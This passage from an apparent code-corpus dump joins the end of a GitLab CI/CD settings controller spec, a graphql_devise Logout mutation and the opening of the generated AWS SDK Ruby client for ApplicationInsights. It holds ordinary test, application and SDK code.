expect(flash[:toast]).to eq('New runners registration token has been generated!')
end
it 'redirects the user to admin runners page' do
subject
expect(response).to redirect_to(namespace_project_settings_ci_cd_path)
end
end
describe 'PATCH update' do
let(:params) { { ci_config_path: '' } }
subject do
patch :update,
params: {
namespace_id: project.namespace.to_param,
project_id: project,
project: params
}
end
it 'redirects to the settings page' do
subject
expect(response).to have_gitlab_http_status(:found)
expect(flash[:toast]).to eq("Pipelines settings for '#{project.name}' were successfully updated.")
end
context 'when updating the auto_devops settings' do
let(:params) { { auto_devops_attributes: { enabled: '' } } }
context 'following the instance default' do
let(:params) { { auto_devops_attributes: { enabled: '' } } }
it 'allows enabled to be set to nil' do
subject
project_auto_devops.reload
expect(project_auto_devops.enabled).to be_nil
end
end
context 'when run_auto_devops_pipeline is true' do
before do
expect_next_instance_of(Projects::UpdateService) do |instance|
expect(instance).to receive(:run_auto_devops_pipeline?).and_return(true)
end
end
context 'when the project repository is empty' do
it 'sets a notice flash' do
subject
expect(controller).to set_flash[:notice]
end
it 'does not queue a CreatePipelineWorker' do
expect(CreatePipelineWorker).not_to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
end
end
context 'when the project repository is not empty' do
let(:project) { create(:project, :repository) }
it 'displays a toast message' do
allow(CreatePipelineWorker).to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
expect(controller).to set_flash[:toast]
end
it 'queues a CreatePipelineWorker' do
expect(CreatePipelineWorker).to receive(:perform_async).with(project.id, user.id, project.default_branch, :web, any_args)
subject
end
it 'creates a pipeline', :sidekiq_inline do
project.repository.create_file(user, 'Gemfile', 'Gemfile contents',
message: 'Add Gemfile',
branch_name: 'master')
expect { subject }.to change { Ci::Pipeline.count }.by(1)
end
end
end
context 'when run_auto_devops_pipeline is not true' do
before do
expect_next_instance_of(Projects::UpdateService) do |instance|
expect(instance).to receive(:run_auto_devops_pipeline?).and_return(false)
end
end
it 'does not queue a CreatePipelineWorker' do
expect(CreatePipelineWorker).not_to receive(:perform_async).with(project.id, user.id, :web, any_args)
subject
end
end
end
context 'when updating general settings' do
context 'when build_timeout_human_readable is not specified' do
let(:params) { { build_timeout_human_readable: '' } }
it 'set default timeout' do
subject
project.reload
expect(project.build_timeout).to eq(3600)
end
end
context 'when build_timeout_human_readable is specified' do
let(:params) { { build_timeout_human_readable: '1h 30m' } }
it 'set specified timeout' do
subject
project.reload
expect(project.build_timeout).to eq(5400)
end
end
context 'when build_timeout_human_readable is invalid' do
let(:params) { { build_timeout_human_readable: '5m' } }
it 'set specified timeout' do
subject
expect(controller).to set_flash[:alert]
expect(response).to redirect_to(namespace_project_settings_ci_cd_path)
end
end
context 'when default_git_depth is not specified' do
let(:params) { { ci_cd_settings_attributes: { default_git_depth: 10 } } }
before do
project.ci_cd_settings.update!(default_git_depth: nil)
end
it 'set specified git depth' do
subject
project.reload
expect(project.ci_default_git_depth).to eq(10)
end
end
context 'when forward_deployment_enabled is not specified' do
let(:params) { { ci_cd_settings_attributes: { forward_deployment_enabled: false } } }
before do
project.ci_cd_settings.update!(forward_deployment_enabled: nil)
end
it 'sets forward deployment enabled' do
subject
project.reload
expect(project.ci_forward_deployment_enabled).to eq(false)
end
end
context 'when max_artifacts_size is specified' do
let(:params) { { max_artifacts_size: 10 } }
context 'and user is not an admin' do
it 'does not set max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to be_nil
end
end
context 'and user is an admin' do
let(:user) { create(:admin) }
context 'with admin mode disabled' do
it 'does not set max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to be_nil
end
end
context 'with admin mode enabled', :enable_admin_mode do
it 'sets max_artifacts_size' do
subject
project.reload
expect(project.max_artifacts_size).to eq(10)
end
end
end
end
end
end
describe 'GET #runner_setup_scripts' do
it 'renders the setup scripts' do
get :runner_setup_scripts, params: { os: 'linux', arch: 'amd64', namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:ok)
expect(json_response).to have_key("install")
expect(json_response).to have_key("register")
end
it 'renders errors if they occur' do
get :runner_setup_scripts, params: { os: 'foo', arch: 'bar', namespace_id: project.namespace, project_id: project }
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response).to have_key("errors")
end
end
end
| 30.954023 | 137 | 0.640457 |
01d51502da244599ffe03755c0bcf2b51948657b | 515 | # frozen_string_literal: true
module GraphqlDevise
module Mutations
class Logout < Base
def resolve
if current_resource && client && current_resource.tokens[client]
current_resource.tokens.delete(client)
current_resource.save!
remove_resource
yield current_resource if block_given?
{ authenticatable: current_resource }
else
raise_user_error(I18n.t('graphql_devise.user_not_found'))
end
end
end
end
end
| 22.391304 | 72 | 0.656311 |
626e58f87c1fb8da36f47990766aea93718867f3 | 77,324 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/checksum_algorithm.rb'
require 'aws-sdk-core/plugins/defaults_mode.rb'
require 'aws-sdk-core/plugins/recursion_detection.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:applicationinsights)
module Aws::ApplicationInsights
# An API client for ApplicationInsights. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::ApplicationInsights::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :applicationinsights
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::ChecksumAlgorithm)
add_plugin(Aws::Plugins::DefaultsMode)
add_plugin(Aws::Plugins::RecursionDetection)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::JsonRpc)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` or `Aws::ECSCredentials` to
# enable retries and extended timeouts. Instance profile credential
# fetching can be disabled by setting ENV['AWS_EC2_METADATA_DISABLED']
# to true.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [String] :defaults_mode ("legacy")
# See {Aws::DefaultsModeConfiguration} for a list of the
# accepted modes and the configuration defaults that are included.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :simple_json (false)
# Disables request parameter conversion, validation, and formatting.
# Also disable response data type conversions. This option is useful
# when you want to ensure the highest level of performance by
# avoiding overhead of walking request parameters and response data
# structures.
#
# When `:simple_json` is enabled, the request parameters hash must
# be formatted exactly as the DynamoDB API expects.
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :use_dualstack_endpoint
# When set to `true`, dualstack enabled endpoints (with `.aws` TLD)
# will be used if available.
#
# @option options [Boolean] :use_fips_endpoint
# When set to `true`, fips compatible endpoints will be used if available.
# When a `fips` region is used, the region is normalized and this config
# is set to `true`.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Float] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Float] :ssl_timeout (nil) Sets the SSL timeout
# in seconds.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Adds an application that is created from a resource group.
#
# @option params [String] :resource_group_name
# The name of the resource group.
#
# @option params [Boolean] :ops_center_enabled
# When set to `true`, creates opsItems for any problems detected on an
# application.
#
# @option params [Boolean] :cwe_monitor_enabled
# Indicates whether Application Insights can listen to CloudWatch events
# for the application resources, such as `instance terminated`, `failed
# deployment`, and others.
#
# @option params [String] :ops_item_sns_topic_arn
# The SNS topic provided to Application Insights that is associated to
# the created opsItem. Allows you to receive notifications for updates
# to the opsItem.
#
# @option params [Array<Types::Tag>] :tags
# List of tags to add to the application. tag key (`Key`) and an
# associated tag value (`Value`). The maximum length of a tag key is 128
# characters. The maximum length of a tag value is 256 characters.
#
# @option params [Boolean] :auto_config_enabled
#
# @option params [Boolean] :auto_create
#
# @return [Types::CreateApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.create_application({
# resource_group_name: "ResourceGroupName",
# ops_center_enabled: false,
# cwe_monitor_enabled: false,
# ops_item_sns_topic_arn: "OpsItemSNSTopicArn",
# tags: [
# {
# key: "TagKey", # required
# value: "TagValue", # required
# },
# ],
# auto_config_enabled: false,
# auto_create: false,
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateApplication AWS API Documentation
#
# @overload create_application(params = {})
# @param [Hash] params ({})
def create_application(params = {}, options = {})
req = build_request(:create_application, params)
req.send_request(options)
end
# Creates a custom component by grouping similar standalone instances to
# monitor.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [required, Array<String>] :resource_list
# The list of resource ARNs that belong to the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.create_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# resource_list: ["ResourceARN"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateComponent AWS API Documentation
#
# @overload create_component(params = {})
# @param [Hash] params ({})
def create_component(params = {}, options = {})
req = build_request(:create_component, params)
req.send_request(options)
end
# Adds an log pattern to a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @option params [required, String] :pattern
# The log pattern. The pattern must be DFA compatible. Patterns that
# utilize forward lookahead or backreference constructions are not
# supported.
#
# @option params [required, Integer] :rank
# Rank of the log pattern. Must be a value between `1` and `1,000,000`.
# The patterns are sorted by rank, so we recommend that you set your
# highest priority patterns with the lowest rank. A pattern of rank `1`
# will be the first to get matched to a log line. A pattern of rank
# `1,000,000` will be last to get matched. When you configure custom log
# patterns from the console, a `Low` severity pattern translates to a
# `750,000` rank. A `Medium` severity pattern translates to a `500,000`
# rank. And a `High` severity pattern translates to a `250,000` rank.
# Rank values less than `1` or greater than `1,000,000` are reserved for
# AWS-provided patterns.
#
# @return [Types::CreateLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
# * {Types::CreateLogPatternResponse#resource_group_name #resource_group_name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# pattern: "LogPatternRegex", # required
# rank: 1, # required
# })
#
# @example Response structure
#
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
# resp.resource_group_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/CreateLogPattern AWS API Documentation
#
# @overload create_log_pattern(params = {})
# @param [Hash] params ({})
def create_log_pattern(params = {}, options = {})
req = build_request(:create_log_pattern, params)
req.send_request(options)
end
# Removes the specified application from monitoring. Does not delete the
# application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_application({
# resource_group_name: "ResourceGroupName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteApplication AWS API Documentation
#
# @overload delete_application(params = {})
# @param [Hash] params ({})
def delete_application(params = {}, options = {})
req = build_request(:delete_application, params)
req.send_request(options)
end
# Ungroups a custom component. When you ungroup custom components, all
# applicable monitors that are set up for the component are removed and
# the instances revert to their standalone status.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteComponent AWS API Documentation
#
# @overload delete_component(params = {})
# @param [Hash] params ({})
def delete_component(params = {}, options = {})
req = build_request(:delete_component, params)
req.send_request(options)
end
# Removes the specified log pattern from a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DeleteLogPattern AWS API Documentation
#
# @overload delete_log_pattern(params = {})
# @param [Hash] params ({})
def delete_log_pattern(params = {}, options = {})
req = build_request(:delete_log_pattern, params)
req.send_request(options)
end
# Describes the application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @return [Types::DescribeApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.describe_application({
# resource_group_name: "ResourceGroupName", # required
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeApplication AWS API Documentation
#
# @overload describe_application(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeApplication request in one step.
def describe_application(params = {}, options = {})
  build_request(:describe_application, params).send_request(options)
end
# Describes a component and lists the resources that are grouped
# together in a component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Types::DescribeComponentResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentResponse#application_component #application_component} => Types::ApplicationComponent
# * {Types::DescribeComponentResponse#resource_list #resource_list} => Array<String>
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# })
#
# @example Response structure
#
# resp.application_component.component_name #=> String
# resp.application_component.component_remarks #=> String
# resp.application_component.resource_type #=> String
# resp.application_component.os_type #=> String, one of "WINDOWS", "LINUX"
# resp.application_component.tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.application_component.monitor #=> Boolean
# resp.application_component.detected_workload #=> Hash
# resp.application_component.detected_workload["Tier"] #=> Hash
# resp.application_component.detected_workload["Tier"]["MetaDataKey"] #=> String
# resp.resource_list #=> Array
# resp.resource_list[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponent AWS API Documentation
#
# @overload describe_component(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeComponent request in one step.
def describe_component(params = {}, options = {})
  build_request(:describe_component, params).send_request(options)
end
# Describes the monitoring configuration of the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @return [Types::DescribeComponentConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentConfigurationResponse#monitor #monitor} => Boolean
# * {Types::DescribeComponentConfigurationResponse#tier #tier} => String
# * {Types::DescribeComponentConfigurationResponse#component_configuration #component_configuration} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component_configuration({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# })
#
# @example Response structure
#
# resp.monitor #=> Boolean
# resp.tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.component_configuration #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponentConfiguration AWS API Documentation
#
# @overload describe_component_configuration(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeComponentConfiguration request in one step.
def describe_component_configuration(params = {}, options = {})
  build_request(:describe_component_configuration, params).send_request(options)
end
# Describes the recommended monitoring configuration of the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [required, String] :tier
# The tier of the application component. Supported tiers include
# `DOT_NET_CORE`, `DOT_NET_WORKER`, `DOT_NET_WEB`, `SQL_SERVER`, and
# `DEFAULT`.
#
# @return [Types::DescribeComponentConfigurationRecommendationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeComponentConfigurationRecommendationResponse#component_configuration #component_configuration} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_component_configuration_recommendation({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# tier: "CUSTOM", # required, accepts CUSTOM, DEFAULT, DOT_NET_CORE, DOT_NET_WORKER, DOT_NET_WEB_TIER, DOT_NET_WEB, SQL_SERVER, SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP, MYSQL, POSTGRESQL, JAVA_JMX, ORACLE, SAP_HANA_MULTI_NODE, SAP_HANA_SINGLE_NODE, SAP_HANA_HIGH_AVAILABILITY, SQL_SERVER_FAILOVER_CLUSTER_INSTANCE, SHAREPOINT, ACTIVE_DIRECTORY
# })
#
# @example Response structure
#
# resp.component_configuration #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeComponentConfigurationRecommendation AWS API Documentation
#
# @overload describe_component_configuration_recommendation(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeComponentConfigurationRecommendation
# request in one step.
def describe_component_configuration_recommendation(params = {}, options = {})
  build_request(:describe_component_configuration_recommendation, params).send_request(options)
end
# Describe a specific log pattern from a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
